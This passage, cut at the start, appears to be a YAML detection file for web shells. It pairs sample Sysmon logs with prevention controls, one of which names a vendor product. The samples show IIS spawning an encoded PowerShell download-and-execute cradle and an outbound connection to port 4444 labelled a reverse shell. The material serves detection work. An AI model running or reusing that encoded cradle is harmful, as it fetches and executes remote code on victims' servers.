Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe -NonInteractive -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA
ParentProcessId: 2840
ParentImage: C:\Windows\System32\inetsrv\w3wp.exe
# w3wp → powershell.exe with -enc flag = high-confidence Analyst rule signal
'
- Type: Sysmon
EventId: 3
Source: Microsoft-Windows-Sysmon/Operational
Description: Outbound reverse shell / download connection from w3wp.exe child process
MatchedRules:
- Analyst
Sample: 'EventID: 3 (NetworkConnect)
UtcTime: 2024-09-03 07:19:04.882
ProcessId: 8104
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
User: IIS APPPOOL\DefaultAppPool
Protocol: tcp
Initiated: true
SourceIp: 10.20.1.15
SourcePort: 52741
DestinationIp: 185.220.101.55
DestinationHostname: -
DestinationPort: 4444
# w3wp child process making outbound TCP connection to non-RFC1918 IP on non-standard port
'
EmulationScript:
File: emulation/web-shells/emulate.ps1
Language: powershell
Description: Simulates web shell file creation, interpreter spawn with recon commands, and outbound connection
SafetyNotes: Run in isolated lab VM only. Creates a text file (not executable) in a test web directory.
AtomicRef: T1505.003
TheConstant: HTTP request → web server process → child OS interpreter
PreventionSummary: >
Web shells persist because web server processes are permitted to write files to their own
directories and spawn child OS interpreters. Restricting those two behaviors eliminates the
chokepoint regardless of the vulnerability used for initial access.
PreventionOpportunities:
- Category: Endpoint · Application Control
Control: Restrict web server processes from spawning OS interpreters as child processes
Impact: Eliminates the primary web shell execution chokepoint; even if a shell file is
written to disk, it cannot spawn interactive processes.
MagicSwordFit: MagicSword's Spawn Control rules enforce which child processes web server
processes (IIS, Apache, nginx) are permitted to execute, blocking OS interpreter spawns.
MagicSwordTag: lolbas
- Category: Endpoint
Control: Apply strict filesystem write restrictions to web-accessible directories
Impact: Prevents shell files from being written to directories served by the web server;
eliminates the delivery mechanism regardless of which vulnerability is exploited.
- Category: Network
Control: Deploy a Web Application Firewall (WAF) with rules for shell upload patterns
Impact: Provides a network-layer control that can block web shell uploads before they
reach the server, complementing host-based restrictions.